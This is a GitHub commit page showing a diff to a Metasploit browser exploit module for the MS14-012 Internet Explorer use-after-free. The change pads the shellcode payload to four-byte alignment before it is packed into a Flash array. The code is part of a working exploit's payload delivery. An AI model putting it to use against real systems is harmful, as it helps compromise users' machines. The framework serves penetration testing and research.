Skip to content

Commit b84192c

Browse files
committed
Land rapid7#3642 - Be sure which the full payload is used
2 parents 93990f4 + 0424230 commit b84192c

File tree

1 file changed

+7
-1
lines changed

1 file changed

+7
-1
lines changed

modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb

Lines changed: 7 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -108,7 +108,13 @@ def on_request_exploit(cli, request, target_info)
108108
def exploit_template(cli, target_info)
109109

110110
flash_payload = ""
111-
get_payload(cli,target_info).unpack("V*").each do |i|
111+
padded_payload = get_payload(cli,target_info)
112+
113+
while padded_payload.length % 4 != 0
114+
padded_payload += "\x00"
115+
end
116+
117+
padded_payload.unpack("V*").each do |i|
112118
flash_payload << "0x#{i.to_s(16)},"
113119
end
114120
flash_payload.gsub!(/,$/, "")

0 commit comments

Comments
 (0)